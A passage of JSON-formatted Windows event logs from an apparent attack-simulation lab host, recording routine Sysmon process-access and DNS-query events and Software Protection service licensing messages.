07:55:25.998","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1FED-5F25-0000-00106E110500}","TargetProcessId":"5032","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2878,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.998\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1FED-5F25-0000-00106E110500}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.998","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1FED-5F25-0000-00106E110500}","TargetProcessId":"5032","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2879,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:23.876\r\nProcessGuid: {41C8662E-1F73-5F25-0000-001073B90200}\r\nProcessId: 2900\r\nQueryName: WIN-DC-6178966\r\nQueryStatus: 0\r\nQueryResults: fe80::286a:52de:ea43:8266;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\System32\\spoolsv.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:55:23.876","ProcessGuid":"{41C8662E-1F73-5F25-0000-001073B90200}","QueryName":"WIN-DC-6178966","QueryStatus":"0","QueryResults":"fe80::286a:52de:ea43:8266;::ffff:10.0.1.14;","Image":"C:\\Windows\\System32\\spoolsv.exe","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2880,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:23.971\r\nProcessGuid: {41C8662E-1F73-5F25-0000-001073B90200}\r\nProcessId: 2900\r\nQueryName: WIN-DC-6178966\r\nQueryStatus: 0\r\nQueryResults: 10.0.1.14;\r\nImage: C:\\Windows\\System32\\spoolsv.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:55:23.971","ProcessGuid":"{41C8662E-1F73-5F25-0000-001073B90200}","QueryName":"WIN-DC-6178966","QueryStatus":"0","QueryResults":"10.0.1.14;","Image":"C:\\Windows\\System32\\spoolsv.exe","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2881,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:23.971\r\nProcessGuid: {41C8662E-1F73-5F25-0000-001073B90200}\r\nProcessId: 2900\r\nQueryName: WIN-DC-6178966\r\nQueryStatus: 0\r\nQueryResults: fe80::286a:52de:ea43:8266;\r\nImage: C:\\Windows\\System32\\spoolsv.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:55:23.971","ProcessGuid":"{41C8662E-1F73-5F25-0000-001073B90200}","QueryName":"WIN-DC-6178966","QueryStatus":"0","QueryResults":"fe80::286a:52de:ea43:8266;","Image":"C:\\Windows\\System32\\spoolsv.exe","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":36028797018963968,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1066,"SourceName":"Microsoft-Windows-Security-SPP","ProviderGuid":"{E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":12113,"ProcessID":0,"ThreadID":0,"Channel":"Application","Message":"Initialization status for service objects.\r\nC:\\Windows\\system32\\sppwinob.dll, msft:spp/windowsfunctionality/agent/7.0, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:rm/algorithm/inherited/1.0, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:rm/algorithm/phone/1.0, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:rm/algorithm/pkey/detect, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:spp/ActionScheduler/1.0, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:spp/TaskScheduler/1.0, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:spp/statecollector/pkey, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:spp/volume/services/kms/1.0, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:spp/volume/services/kms/activationinfo/1.0, 0x00000000, 0x00000000\n","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":36028797018963968,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1003,"SourceName":"Microsoft-Windows-Security-SPP","ProviderGuid":"{E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":12114,"ProcessID":0,"ThreadID":0,"Channel":"Application","Message":"The Software Protection service has completed licensing status check.\r\nApplication Id=55c92734-d682-4d71-983e-d6ec3f16059f\r\nLicensing Status=\n1: 21c56779-b449-4d20-adfc-eece0e1ad74b, 1, 1 [(0 [0x00000000, 1, 0], [(?)( 1 0x00000000)(?)( 2 0x00000000 0 0 msft:rm/algorithm/volume/1.0 0x4004F040 259187)(?)(?)( 10 0x00000000 msft:rm/algorithm/flags/1.0)(?)])(1 )(2 )(3 )]\n2: 2e7a9ad1-a849-4b56-babe-17d5a29fe4b4, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]\n3: 3c006fa7-3b03-45a4-93da-63ddc1bdce11, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]\n4: 3c2da9a5-1c6e-45d1-855f-fdbef536676f, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]\n5: 562634bb-b8d8-43eb-8325-bf63a42c4174, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]\n6: 58448dfb-6ac0-4e06-b491-07f2b657b268, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]\n7: 942efa8f-516f-46d8-8541-b1ee1bce08c6, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]\n8: 9db83b52-9904-4326-8957-ebe6feedf37c, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]\n9: a43f7b89-8023-413a-9f58-b8aec2c04d00, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]\n10: cbf3499f-848e-488b-a165-ac6d7e27439d, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]\n11: d6992aac-29e7-452a-bf10-bbfb8ccabe59, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]\n12: d839f159-1128-480b-94b6-77fa9943a16a, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]\n13: fea51083-1906-44ed-9072-86af9be7ab9a, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]\n\n","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":36028797018963968,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":902,"SourceName":"Microsoft-Windows-Security-SPP","ProviderGuid":"{E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":12115,"ProcessID":0,"ThreadID":0,"Channel":"Application","Message":"The Software Protection service has started.\r\n10.0.14393.3541","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2882,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.248\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1FED-5F25-0000-00106E110500}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.248","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1FED-5F25-0000-00106E110500}","TargetProcessId":"5032","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2883,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.248\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1FED-5F25-0000-00106E110500}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.248","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1FED-5F25-0000-00106E110500}","TargetProcessId":"5032","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2884,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.248\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1FED-5F25-0000-00106E110500}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.248","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1FED-5F25-0000-00106E110500}","TargetProcessId":"5032","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2885,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.264\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1FED-5F25-0000-00106E110500}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.264","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1FED-5F25-0000-00106E110500}","TargetProcessId":"5032","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
